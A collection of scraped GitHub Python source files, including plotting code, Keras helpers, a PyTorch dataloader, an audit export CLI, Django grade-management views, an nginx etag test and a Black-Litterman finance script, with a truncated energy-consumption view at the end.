3))\n linewidth = 5\n\n for numRelevantDimension in np.arange(3) + 1:\n # for informed and uninformed games separately\n for idx, informed in enumerate([True, False]):\n all_curves = [None] * 5\n p = [None] * 5\n for iCurve in range(5):\n all_curves[iCurve] = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['informed'] == informed) & (\n data['numRelevantDimensions'] == numRelevantDimension)].copy()\n learning_curves = choiceChangeTypeCounts(current_df)\n for iCurve in range(5):\n all_curves[iCurve].append(learning_curves[iCurve])\n ax = axes[idx, numRelevantDimension - 1]\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n for iCurve in range(5):\n p[iCurve], _ = plot_learning_curves(ax, varName, all_curves[iCurve], wIndividualCurves, colors[iCurve],\n np.nan, '', None, gameLength, numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n \n if ifPublish:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if not informed:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n else:\n ax.set_title(f'{numRelevantDimension}D-relevant', fontsize=fontsize)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', labelpad=8, fontsize=fontsize)\n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n fig.suptitle('Choice change type', fontsize=fontsize+0.5, y=0.9)\n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n if wLegend:\n fig.legend(handles=p, labels=['Add', 'Drop', 'Switch within dimension', 'Switch across dimensions', 'Other'], bbox_to_anchor=(1, 0.75), frameon=False)\n else:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.set_ylim(0, 1)\n if numRelevantDimension == 1:\n ax.set_ylabel('Unknown' if informed else 'Unknown', fontsize=fontsize)\n if idx == 0:\n ax.set_xlabel(str(numRelevantDimension) + 'D relevant', fontsize=fontsize)\n ax.xaxis.set_label_position('top')\n ax.tick_params(axis='both', labelsize=fontsize)\n if wTitleAxLabel:\n fig.text(0.5, 0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 0.95, 'Frequency', ha='center', fontsize=fontsize)\n if wLegend:\n fig.legend(handles=p, labels=['add', 'drop', 'switch_within', 'switch_across', 'mixed'], loc=\"center right\")\n \n if showFigure:\n plt.tight_layout()\n plt.show()\n else:\n # plt.tight_layout()\n plt.savefig('figures/' + expVersion + '_' + varName + '.png', bbox_inches='tight')\n \n return fig, axes","repo_name":"mingyus/humans-combine-value-learning-and-hypothesis-testing","sub_path":"learningCurve.py","file_name":"learningCurve.py","file_ext":"py","file_size_in_byte":33417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39071418891","text":"from keras.optimizers import Adagrad, Adadelta, Adamax, Nadam\nfrom .metric import F1, J\n\n\ndef get_custom_metrics():\n \"\"\"\n Returns a dictionary of custom metric layers/functions.\n\n Returns\n --------\n A dictionary.\n \"\"\"\n\n return {\n 'global_weighted_f1': F1,\n 'global_macro_j': J\n }\n\n\ndef get_optimizers():\n \"\"\"\n Returns a dictionary of optimizer layers.\n\n Returns\n -------\n A dictionary.\n \"\"\"\n\n return {\n 'Adagrad': Adagrad,\n 'Adadelta': Adadelta,\n 'Adamax': Adamax,\n 'Nadam': Nadam\n }\n\n\ndef get_custom_losses():\n \"\"\"\n Returns a dictionary of custom loss functions.\n\n Returns\n -------\n A dictionary.\n \"\"\"\n return {}\n\n\n\ndef build_metrics(metrics_list, kwargs):\n \"\"\"\n Builds tf graph objects from a list of metric names.\n\n Parameters\n ----------\n metrics_list: A string, or a list of strings.\n Each string is the name of a metric.\n kwargs: Dictionary.\n Parameters to pass into the constructor of these metrics.\n\n Returns\n -------\n A list of metric objects.\n \"\"\"\n\n # If metrics is not a list, put it into a list\n if not isinstance(metrics_list, list) and not isinstance(metrics_list, tuple):\n metrics_list = [metrics_list]\n\n # A dictionary of custom metrics objects\n custom_objects = get_custom_metrics()\n\n # If a metric exists in Keras already, do nothing.\n # If a metric is custom, build a new stateful metrics layer.\n metrics = []\n for m in metrics_list:\n if m in custom_objects:\n metrics += custom_objects[m](**kwargs),\n else:\n metrics += m,\n\n return metrics\n\n\ndef build_optimizer(optimizer_name, kwargs):\n \"\"\"\n Builds a tf graph object from an optimizer name.\n\n Parameter\n ---------\n optimizer_name: String.\n Name of an optimizer.\n kwargs: Dictionary.\n Parameters to pass into the constructor of this optimizer.\n\n Return\n ------\n An optimizer.\n \"\"\"\n\n # A dictionary of optimizers\n optimizers = get_optimizers()\n\n return optimizers[optimizer_name](**kwargs)\n\n\ndef build_loss(loss_name, kwargs):\n \"\"\"\n Builds a tf graph object from a loss name.\n\n Parameter\n ---------\n loss_name: String.\n Name of a loss function.\n kwargs: Dictionary.\n Parameters to pass into the constructor of this loss function.\n\n Return\n ------\n A loss function.\n \"\"\"\n losses = get_custom_losses()\n\n if loss_name in losses:\n return losses[loss_name](**kwargs)\n else:\n return loss_name","repo_name":"fagan2888/trace-classifier","sub_path":"trace_classifier/custom_objects.py","file_name":"custom_objects.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4169363005","text":"#http://acm.timus.ru/help.aspx?topic=python\r\n\r\nimport sys, math\r\nnums = [] #crea una lista vacia llamada nums\r\nfor line in sys.stdin: #a cada elemento en la lista introducida atravez de stdin\r\n for word in line.split(): #los separa en cada espacio y a acada elemento de las nuevas listas\r\n nums.append(float(word)) #los transforma en reales y los pone en la lista nums\r\nnums.reverse() #invierte la lista nums\r\nfor num in nums: #a cada elemento de nums\r\n print(\"%.4f\" % math.sqrt(num))#muestra su raiz cuadrada hasta el 4° decimal en la consola \r\n","repo_name":"bgonzalo/progcomp","sub_path":"bgonzalo_prob1001.py","file_name":"bgonzalo_prob1001.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69841636487","text":"from utils import *\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom glob import glob\nfrom PIL import Image\nimport os\nimport pandas as pd\nfrom torchvision import transforms\n\ndef dataloader(data_path):\n\n Images_path_lst=glob(os.path.join(data_path, 'images/*'))\n oasis = pd.read_csv(os.path.join(data_path, 'OASIS.csv'))\n oasis['normalized_valence']=min_max_normalize(oasis['Valence_mean'])\n oasis['normalized_arousal']=min_max_normalize(oasis['Arousal_mean'])\n oasis['valence_classification']=reg_to_classification(oasis['normalized_valence'])\n oasis['arousal_classification']=reg_to_classification(oasis['normalized_arousal'])\n\n#이 순서대로 label도 필요하니까\n train_image_lst=glob(os.path.join(data_path, '/train/*'))\n test_image_lst=glob(os.path.join(data_path, '/test/*'))\n \n train_lst=[]\n for i in train_image_lst:\n result=i.split('/')\n result=result[7]\n result=result.split('.')\n result=result[0]\n train_lst.append(result)\n\n test_lst=[]\n for i in test_image_lst:\n result=i.split('/')\n result=result[7]\n result=result.split('.')\n result=result[0]\n test_lst.append(result)\n\n#train_image_lst는 train시킬 이미지들 path\n#train_lst는 이미지들 파일명\n#train, test 폴더 안에 들어 있는 파일 순서대로 train_label(valence, arousal), test_label 만들어야함\n train_valence_lst=[]\n train_arousal_lst=[]\n test_valence_lst=[]\n test_arousal_lst=[]\n\n train_val_clf_lst=[]\n train_aro_clf_lst=[]\n test_val_clf_lst=[]\n test_aro_clf_lst=[]\n\n theme=list(oasis['Theme'])\n valence=list(oasis['normalized_valence'])\n arousal=list(oasis['normalized_arousal'])\n valence_clf=list(oasis['valence_classification'])\n arousal_clf=list(oasis['arousal_classification'])\n\n for i in train_lst:\n idx=theme.index(i)\n train_valence_lst.append(valence[idx])\n train_arousal_lst.append(arousal[idx])\n train_val_clf_lst.append(valence_clf[idx])\n train_aro_clf_lst.append(arousal_clf[idx])\n \n\n for j in test_lst:\n idx=theme.index(i)\n test_valence_lst.append(valence[idx])\n test_arousal_lst.append(arousal[idx])\n test_val_clf_lst.append(valence_clf[idx])\n test_aro_clf_lst.append(arousal_clf[idx])\n\n#train_image_lst는 train시킬 이미지들 path\n#train_lst는 이미지들 파일명\n#train_valence_lst는 train 폴더에 있는 이미지 순서대로 valence 라벨값\n#train_arousal_lst는 train 폴더에 있는 이미지 순서대로 arousal 라벨값\n#train_val_clf_lst는 train 폴더에 있는 이미지 순서대로 valence 0,1 분류된 값\n# train / val 에 대한 transform(전처리)를 각각 정의한 딕셔너리 만들기\n\n data_transforms = {'train': transforms.Compose( [transforms.RandomResizedCrop(224), # 224로 바꿔준다.\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225])] ), # rgb임으로 3개씩; 대중적으로 널리 알려진 값\n 'val': transforms.Compose( [transforms.Resize(256),\n transforms.CenterCrop(224), # 최종적으로 train과 같이 224로 바꿔준다.\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225])] ) # 위와 동일\n }\n\n train_dataset=Dataset(train_image_lst, train_valence_lst, train_arousal_lst, train_val_clf_lst, train_aro_clf_lst, data_transforms['train'])\n test_dataset=Dataset(test_image_lst, test_valence_lst, test_arousal_lst, test_val_clf_lst, test_aro_clf_lst, data_transforms['val'])\n if len(train_dataset) <=0:\n train_dataset = torch.load(os.path.join(data_path, \"train_dataset.pt\"))\n test_dataset = torch.load(os.path.join(data_path, \"test_dataset.pt\"))\n\n train_loader=DataLoader(\n train_dataset, batch_size=32, shuffle=True\n )\n\n test_loader=DataLoader(\n test_dataset, batch_size=32, shuffle=False\n )\n dataloaders = {'train':train_loader, 'test': test_loader}\n dataset_sizes = {'train':len(train_dataset), 'test':len(test_dataset)}\n \n return dataloaders, dataset_sizes","repo_name":"YooChae/DSL-23-1-modeling-Img2Music","sub_path":"image_to_sentiment/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11786958611","text":"import argparse\nimport logging\nimport sys\nimport iso8601\nfrom . import utils\nfrom .auditclient import AuditClient\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='VirtruAuditExportClient',\n description='Allows the export of audit data from a secure Virtru endpoint.')\n parser.add_argument('-i', '--ini',\n help='Configuration file. Example: config.ini',\n dest='configFile',\n required=True)\n parser.add_argument('-s', '--start',\n help='Start date of query. Example: -s 2019-01-01',\n dest='startDate',\n default='2010-01-01',\n required=False)\n parser.add_argument('-e', '--end',\n help='End date of query. Example: -e 2019-02-01',\n dest='endDate',\n default='2100-01-01',\n required=False)\n parser.add_argument('--csv',\n help='CSV output folder. If defined CSV will be exported',\n dest='csv',\n default=None,\n required=False)\n parser.add_argument('--json',\n help='Json output folder. If defined Json will be exported. Example: output/ '\n '/home/user/json/',\n dest='json',\n default=None,\n required=False)\n parser.add_argument('--sysloghost',\n help='Syslog server. If defined syslog will be exported',\n dest='sysloghost',\n default=None,\n required=False)\n parser.add_argument('--syslogport',\n help='Syslog port. If a different port is required.',\n dest='syslogport',\n default='514',\n required=False)\n parser.add_argument('-b', '--bookmark',\n help='Start from last bookmark',\n dest='useBookMark',\n default=False,\n required=False,\n action='store_true')\n parser.add_argument('-v', '--verbose',\n help='Verbose option',\n dest='verbose',\n default=False,\n required=False,\n action='store_true')\n\n # Get args from config parser\n args = parser.parse_args()\n\n # Set Log level\n loglevel = logging.DEBUG if args.verbose is True else logging.ERROR\n logger.parent.handlers[0].setLevel(loglevel)\n\n # Get config information from config.ini file\n logger.debug('retriving info from config.ini....')\n config = utils.getConfig(args.configFile)\n apiTokenId = config['apiTokenId']\n apiTokenSecret = config['apiTokenSecret']\n apiHost = config['apiHost']\n apiPath = config['apiPath']\n\n # Initialize auditclient\n auditclient = AuditClient(apiTokenSecret, apiTokenId, apiHost, apiPath)\n\n # Begin Processing\n try:\n logger.debug('begin processing......')\n process(args, auditclient, utils)\n except Exception as e:\n logging.exception(e)\n\n\ndef process(args, auditclient, utils):\n\n logger.debug('fetching bookmark.......')\n\n bookMark = utils.getNextPageStartKey()\n nextPageStartKey = None if not bookMark else bookMark['nextpagestartkey']\n\n logger.debug('nextpagestartkey: %s' % (nextPageStartKey))\n\n queryStart = args.startDate\n queryEnd = args.endDate\n\n # Check dates are in valid IS08601 format\n iso8601.parse_date(queryStart)\n iso8601.parse_date(queryEnd)\n\n jsonFolderPath = args.json\n csvFolderPath = args.csv\n syslogHost = args.sysloghost\n syslogPort = args.syslogport\n useBookMark = args.useBookMark\n\n logger.debug('usebookmark: %s' % (useBookMark))\n\n # Syslog logger\n syslogger = None if syslogHost is None else utils.configSysLogger(\n syslogHost, syslogPort)\n\n req = {\n 'method': 'GET',\n 'query': {\n 'start': queryStart,\n 'end': queryEnd\n }\n }\n\n if(nextPageStartKey and useBookMark):\n req['query']['nextPageStartKey'] = nextPageStartKey\n\n hasMore = True\n iteration = 1\n\n logger.debug('fetching audit records....')\n while hasMore:\n records = auditclient.fetchRecords(req)\n if(jsonFolderPath and records['docs']):\n utils.exportToJson(jsonFolderPath, records['docs'])\n if(csvFolderPath and records['docs']):\n utils.exportToCsv(csvFolderPath, records['docs'])\n if(syslogHost is not None and records['docs']):\n utils.exportToSysLog(syslogHost, syslogPort,\n syslogger, records['docs'])\n\n if 'nextPageStartKey' in records:\n logger.debug('found nextpagestartkey')\n nextPageStartKey = records['nextPageStartKey']\n req['query']['nextPageStartKey'] = nextPageStartKey\n else:\n hasMore = False\n if records['docs']:\n nextPageStartKey = records['docs'][-1]['recordId']\n\n if(useBookMark):\n utils.saveNextPageStartKey(nextPageStartKey)\n\n print('Iteration :' + str(iteration) + '\\t\\t' + 'Items: ' +\n str(len(records['docs'])) + '\\t\\t' + 'NextPageStartKey: ' + str(nextPageStartKey))\n iteration += 1\n print('All records exported!!!!')\n","repo_name":"virtru/audit-export-client","sub_path":"auditexport/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30363732777","text":"\nfrom .views import home,listfirs,viewcomplaints,complaintdetails,firupdate\nfrom django.urls import path\n\napp_name=\"policeapp\"\n\nurlpatterns = [\n path('', home,name=\"policehome\"),\n path('viewcomplaints/', viewcomplaints,name=\"viewcomplaints\"),\n path('listfirs/', listfirs,name=\"listfirs\"),\n path('complaintdetails/', complaintdetails,name=\"complaintdetails\"),\n path('firupdate/', firupdate,name=\"firupdate\"),\n] \n","repo_name":"marjanp07/mini-project-django","sub_path":"policeapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5400508657","text":"from django.shortcuts import render , redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom .models import Students, Student_RegistrationTable, Instructors, Instructor_RegistrationTable, Courses\n\nimport sys\nsys.path.append('../')\n\nfrom Grades.models import Marks, Grades\n\ndef usertype(request,id):\n for obj in Instructors.objects.all():\n if obj.instructor_id==id:\n request.session['usertype'] = 'instructor'\n for obj in Students.objects.all():\n if obj.student_id==id:\n request.session['usertype'] = 'student'\n\n\ndef login_user(request):\n if request.method==\"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n usertype(request,username)\n if request.user.username==\"admin\":\n return redirect('/admin/')\n else:\n return redirect('home')\n else:\n messages.success(request,(\"Incorrect username or password. Please try again\"))\n return redirect('login')\n else:\n return render(request,'registration/login.html',{})\n\ndef logout_user(request):\n logout(request)\n messages.success(request,(\"Logged out successfully.\"))\n return redirect('login')\n\n\n\ndef home(request):\n #usertype(request.user.username)\n request.session['textee']=\"\"\n if request.session['usertype']=='student':\n studentid = request.user.username\n studentinfo= Students.objects.get(student_id=studentid)\n studentcourses = Student_RegistrationTable.objects.filter(student_id=studentid)\n \n if request.method==\"POST\":\n request.session['course'] = request.POST['course']\n return redirect('coursepage')\n\n l1=[]\n for element in studentcourses:\n a = str(element.course_id).strip(\"Courses Object \")\n b = a.strip(\"(\")\n l1.append(b.strip(\")\"))\n\n d={}\n for c in l1:\n courserec = Courses.objects.get(course=c)\n desc = str(courserec.course_desc)\n d[c]=desc\n return render(request, 'registration/home.html',{'info':studentinfo,'courses':d})\n \n elif request.session['usertype']=='instructor':\n inst_id = request.user.username\n inst_info= Instructors.objects.get(instructor_id=inst_id)\n instcourses = Instructor_RegistrationTable.objects.filter(instructor_id=inst_id)\n inst_courses=[]\n for ic in instcourses:\n a=str(ic.course_id).strip(\"Courses Object \")\n b = a.strip(\"(\")\n inst_courses.append(b.strip(\")\"))\n \n if request.method==\"POST\":\n request.session['course'] = request.POST['course']\n return redirect('coursepage')\n return render(request, 'registration/home.html',{'info':inst_info,'courses':inst_courses})\n\n\ndef course_page(request):\n courseinfo = Courses.objects.get(course=request.session['course'])\n return render(request, 'registration/coursepage.html',{'courseinfo':courseinfo})\n\ndef gradesheet(request):\n studentid = request.user.username\n studentGrades = Grades.objects.filter(studentID=studentid)\n l=[]\n for rec in studentGrades:\n a = (str(rec.courseID)).strip(\"Course object \")\n b = a.strip(\"(\")\n l.append(b.strip(\")\"))\n\n studentinfo = Students.objects.get(student_id= studentid)\n\n credits = []\n d = {}\n for c in l:\n cours = Courses.objects.get(course=c)\n credits.append(cours.credit)\n d[c] = cours.credit\n \n totalgrades = 0\n totalcreds = 0\n for key in d:\n for grades in studentGrades:\n if str(grades.courseID) == (\"Courses object (\"+key+\")\"):\n totalgrades += float(grades.grade)*float(d[key])\n totalcreds += float(d[key])\n \n if totalcreds!=0:\n cg = totalgrades/totalcreds\n else:\n cg = 0\n\n return render(request, 'registration/grades.html',{'studentGrades':studentGrades,'courses':l,'studentinfo':studentinfo,'credits':credits,'cg':cg})\n\ndef marks(request):\n if request.session['usertype']=='student':\n studentid = request.user.username\n courseid = request.session['course']\n studentMarks = Marks.objects.filter(studentID=studentid).filter(courseID=courseid)\n studentinfo = Students.objects.get(student_id=studentid)\n return render(request, 'registration/marks.html',{'table':studentMarks,'info':studentinfo,'studentid':studentid})\n \n elif request.session['usertype']=='instructor':\n if request.method==\"POST\":\n if request.POST['marks']==\"Upload marks for assessment\":\n return redirect('uploadmarks')\n elif request.POST['marks']==\"Upload Final Grades\":\n return redirect('uploadfinal')\n return render(request,'registration/uploadgrades.html',{})\n\ndef uploadmarks(request):\n if request.method==\"POST\":\n if request.POST['studentID'] and request.POST['assessment'] and request.POST['weightage'] and request.POST['total_marks'] and request.POST['marks']:\n table = Marks()\n table.studentID = Students.objects.get(student_id=request.POST['studentID'])\n table.courseID = Courses.objects.get(course= request.session['course'])\n table.assessment = request.POST['assessment']\n table.weightage = request.POST['weightage']\n table.total_marks = request.POST['total_marks']\n table.marks = request.POST['marks']\n table.save()\n messages.success(request,(\"Data entered\"))\n return redirect('uploadmarks')\n return render(request, 'registration/uploadmarks.html',{})\n\ndef uploadfinal(request):\n if request.method==\"POST\":\n if request.POST['studentID'] and request.POST['grade']:\n table = Grades()\n table.studentID = Students.objects.get(student_id=request.POST['studentID'])\n table.courseID = Courses.objects.get(course= request.session['course'])\n table.grade = int(request.POST['grade'])\n table.save()\n messages.success(request,(\"Data entered\"))\n return redirect('uploadfinal')\n return render(request,'registration/uploadfinal.html',{})","repo_name":"Mitali-N/DevClub-Assignment5","sub_path":"Users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"36796569280","text":"#!/usr/bin/env python\n\nimport requests\n\ndef parse_etag(etag):\n if etag.startswith('W/'): # Weak etag\n etag = etag[2:]\n assert etag.startswith('\"') and etag.endswith('\"')\n return etag[1:-1]\n\ndef to_etag(value):\n return 'W/\"{}\"'.format(value)\n\nnginx_etag = requests.get('http://nginx/').headers['etag']\nnode_etag = requests.get('http://node/').headers['etag']\n\nprint('nginx etag', nginx_etag)\nprint('node etag', node_etag)\n\nnginx_etag = parse_etag(nginx_etag)\nnode_etag = parse_etag(node_etag)\n\nvbar_index = nginx_etag.rindex('|')\nupstream_etag = nginx_etag[:vbar_index]\nproxy_etag = nginx_etag[vbar_index+1:]\n\nprint('proxy etag value', proxy_etag)\nprint('upstream etag value', upstream_etag)\n\nassert node_etag == upstream_etag\n\nassert requests.get('http://node/', headers={\n 'If-None-Match': to_etag(upstream_etag)\n}).status_code == 304\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag, proxy_etag))\n}).status_code == 304\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag + 'P', proxy_etag))\n}).status_code == 200\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag, proxy_etag + 'P'))\n}).status_code == 200\n","repo_name":"Gerhut/nginx-alter-etag","sub_path":"test/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74842901769","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*- \n'多线程'\n__author__ = 'click'\n__date__ = '2018/7/23 下午6:20'\n\nimport time, threading\n\n\ndef threadReadFile():\n print('主线程的名字%s' % threading.current_thread().name)\n # print('读取文件中内容是%s' % myio.ReadAndWrite.readTxt())\n n = 0\n while n < 10:\n n = n + 1\n\n print('执行相加操作结果是%s' % n)\n\n\nt = threading.Thread(target=threadReadFile, name='threadReadFile')\nt.start()\nt.join()\nprint(\"当前线城是%s\" % threading.current_thread().name)\n","repo_name":"Alpha-chen/PythonStudy","sub_path":"process/MultiThread.py","file_name":"MultiThread.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"2248640945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.4'\n# jupytext_version: 1.2.4\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# # s_bl_equilibrium_ret [](https://www.arpm.co/lab/redirect.php?code=s_bl_equilibrium_ret&codeLang=Python)\n# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=eb-blreturns).\n\n# +\nimport numpy as np\nimport pandas as pd\n\nfrom arpym.estimation.cov_2_corr import cov_2_corr\nfrom arpym.estimation.exp_decay_fp import exp_decay_fp\nfrom arpym.statistics.meancov_sp import meancov_sp\nfrom arpym.views.black_litterman import black_litterman\nfrom arpym.views.min_rel_entropy_normal import min_rel_entropy_normal\n# -\n\n# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-parameters)\n\nc = 0.5 # confidence level in the views\nc_uninf = 1e-6 # confidence level in the uninformative views\neta = np.array([1, -1]) # parameters for qualitative views\nlam = 1.2 # average risk-aversion level\ntau_hl = 1386 # half-life parameter\nv = np.array([[1, - 1, 0], [0, 0, 1]]) # pick matrix\nw = np.array([1/3, 1/3, 1/3]) # market-weighted portfolio\n\n# ## [Step 0](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step00): Upload data\n\npath = '~/databases/global-databases/equities/db_stocks_SP500/'\ndata = pd.read_csv(path + 'db_stocks_sp.csv', index_col=0, header=[0, 1])\n\n# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step01): Compute time series of returns\n\nn_ = len(w) # market dimension\nr_t = data.pct_change().iloc[1:, :n_].values # returns\n\n# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step02): Compute the sample mean and the exponential decay sample covariance\n\nt_ = len(r_t)\np_t_tau_hl = exp_decay_fp(t_, tau_hl) # exponential decay probabilities\nmu_hat_r, sig2_hat_r = meancov_sp(r_t, p_t_tau_hl) # sample mean and covariance\n\n# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step03): Compute prior predictive performance parameters\n\n# +\n# expectation in terms of market equilibrium\nmu_r_equil = 2 * lam * sig2_hat_r @ w\n\ntau = t_ # uncertainty level in the reference model\nmu_m_pri = mu_r_equil\nsig2_m_pri = (1 / tau) * sig2_hat_r\ncv_pri_pred = sig2_hat_r + sig2_m_pri\n# -\n\n# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step04): Compute vectors quantifying the views\n\ni = v @ mu_r_equil + eta * np.sqrt(np.diag(v @ cv_pri_pred @ v.T))\nsig2_view = ((1 - c) / c) * (v @ sig2_m_pri @ v.T)\n\n# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step05): Compute effective rank corresponding to the pick matrix\n\n# +\n\ndef eff_rank(s2):\n lam2_n, _ = np.linalg.eig(s2)\n wn = lam2_n / np.sum(lam2_n)\n return np.exp(- wn @ np.log(wn))\n\ncr_i = cov_2_corr(v @ sig2_m_pri @ v.T * 1 / c)[0]\neff_rank = eff_rank(cr_i)\n# -\n\n# ## [Step 6](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step06): Compute posterior predictive performance parameters\n\nmu_m_pos, cv_pos_pred = black_litterman(mu_m_pri, sig2_hat_r, tau, v, i,\n sig2_view)\n\n# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step07): Compute posterior predictive performance parameters in the case of uninformative views\n\n# +\n# compute vector quantifying the views in covariance\nsig2_unifview = ((1 - c_uninf) / c_uninf) * v @ sig2_m_pri @ v.T\n\nmu_m_pos, cv_pos_pred = black_litterman(mu_m_pri, sig2_hat_r, tau, v,\n i, sig2_unifview)\n# -\n\n# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step08): Compute full-confidence posterior predictive performance parameters\n\nmu_r_sure_bl = mu_m_pri + sig2_hat_r @ v.T @ \\\n np.linalg.solve(v @ sig2_hat_r @ v.T, i - v @ mu_m_pri)\nsig2_r_sure_bl = (1 + 1 / tau) * sig2_hat_r - (1 / tau) * sig2_hat_r @ v.T\\\n @ np.linalg.solve(v @ sig2_hat_r @ v.T, v @ sig2_hat_r)\n\n\n# ## [Step 9](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step09): Compare posterior parameters from point views\n\n# +\nk_ = len(v) # view variables dimension\nv_point = v\nz_point = i\n\nmu_r_point, sig2_r_point = min_rel_entropy_normal(mu_m_pri, sig2_hat_r,\n v_point, z_point, v_point,\n np.zeros((k_)))\n# -\n\n# ## [Step 10](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step10): Compute posterior parameters from distributional views (Minimum Relative Entropy)\n\n# +\nv_mre = v\nv_sig_mre = np.eye(n_)\nimre = i\nsig2viewmre = sig2_hat_r\n\nmu_r_mre, sig2_r_mre = min_rel_entropy_normal(mu_m_pri, sig2_hat_r, v_mre,\n imre, v_sig_mre, sig2viewmre)\n","repo_name":"neerav1985/ARPM","sub_path":"Python/scripts/sources/s_bl_equilibrium_ret.py","file_name":"s_bl_equilibrium_ret.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"40711775598","text":"import calendar\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom rest_framework import generics, status\r\nfrom rest_framework.response import Response\r\n\r\nfrom .models import WattConsume\r\nfrom .serializers import OutputSerializer\r\n\r\n\r\ndef daily_consume(td):\r\n return_data = []\r\n for i in range(24):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day,\r\n meter_date__hour=i,\r\n ).last()\r\n consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day,\r\n meter_date__hour=i,\r\n ).first()\r\n td_hour = td + timedelta(hours=i)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\ndef weekly_consume(td):\r\n return_data = []\r\n week_day = td.weekday()\r\n for i in range(7):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day - week_day + i,\r\n ).last()\r\n consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day - 